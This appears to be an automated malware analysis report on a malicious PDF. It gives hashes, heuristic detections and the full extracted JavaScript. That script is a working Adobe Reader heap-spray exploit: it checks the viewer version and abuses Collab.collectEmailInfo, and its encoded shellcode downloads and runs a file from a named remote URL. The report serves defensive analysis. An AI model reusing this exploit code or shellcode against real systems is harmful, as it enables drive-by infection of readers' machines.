Malicious PDF — malware analysis report

Static analysis result for SHA-256 94dcbcf9e84d4983…

MALICIOUS

PDF

2.8 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 462dd55f33b3004d3fc0dda33150abf2 SHA-1: 9decc3de348eb8ef65f05dbc213aa23a6234f2e5 SHA-256: 94dcbcf9e84d4983482f3f813b74d705f750c868184de864efc3594ab5c675ae
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream, identified as 'javascript_obj0013_001.js', is further flagged for suspicious content and obfuscation. The presence of an unescape() call suggests the script is likely obfuscated to hide its malicious intent, which is probably to download and execute a second-stage payload. Due to the obfuscation, the exact payload and delivery mechanism cannot be confidently determined.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var Ypgq8w8T = 0x0c0c0c0c;
       var o9rHiui = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u794 …
       var J41KQnug = 0x400000;
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://buterik.com/123/load.exe Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 2929 bytes
SHA-256: ecb75181857f4fd7e8bbcd9513eab5e4d6d9c4eaffda911e2ffa75b4d2b3009e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function ONESFhVr2po5() {	var KIqyvfMT7kDO4 = new Array(); 
		function dgxKRL(eaFPSHFGMX7eO5, OQ40B) { 
			while (eaFPSHFGMX7eO5.length*2<OQ40B){eaFPSHFGMX7eO5 += eaFPSHFGMX7eO5;} 
			eaFPSHFGMX7eO5 = eaFPSHFGMX7eO5.substring(0,OQ40B/2);
			return eaFPSHFGMX7eO5; 
		}

		function NEThvR2Mna() { 
			var Ypgq8w8T = 0x0c0c0c0c; 
			var o9rHiui = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u622F%u7475%u7265%u6B69%u632E%u6D6F%u312F%u3332%u6C2F%u616F%u2E64%u7865%u0065");
			var J41KQnug = 0x400000;
			var KM3rJALmNTef = o9rHiui.length * 2;
			var OQ40B = J41KQnug - (KM3rJALmNTef+0x38);
			var eaFPSHFGMX7eO5 = unescape("%u9090%u9090");
			eaFPSHFGMX7eO5 = dgxKRL(eaFPSHFGMX7eO5, OQ40B);
			var ZOydI4ERbX = (Ypgq8w8T - 0x400000)/J41KQnug;
			
			for (var ct5b9=0;ct5b9<ZOydI4ERbX;ct5b9++) { 
				KIqyvfMT7kDO4[ct5b9] = eaFPSHFGMX7eO5 + o9rHiui;
			}
		}

		function OruPmbaXydP() {
			var Xk4BDirPHFOuY = app.viewerVersion.toString();
			Xk4BDirPHFOuY = Xk4BDirPHFOuY.replace(/\D/g,"");
			var cz4gTe = new Array(Xk4BDirPHFOuY.charAt(0),Xk4BDirPHFOuY.charAt(1),Xk4BDirPHFOuY.charAt(2));
			var xeJO3D = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((cz4gTe[0] == 8 &&
			((cz4gTe[1] == 1 && cz4gTe[2] < 2) || cz4gTe[1] < 1)) || 
			(cz4gTe[0] == 7 && cz4gTe[1] < 1) || 
			(cz4gTe[0] < 7)) {
			        var B1JHE = Collab;
				NEThvR2Mna();
				var N4K1eryIG = unescape("%u0c0c%u0c0c");
				var NLwX2QBZp = "c24ol2la572bS8to2445r5e00";
				while(N4K1eryIG.length < 44952) N4K1eryIG += N4K1eryIG;
				this[NLwX2QBZp.replace(new RegExp(/\d/g),"")] = B1JHE[xeJO3D.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              N4K1eryIG});
			} 
		}
		OruPmbaXydP();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A 444 bytes
SHA-256: bcb2470f54ff4d180f2f1d8ee994554fbbb7541e67bae743de98e7713ac34a25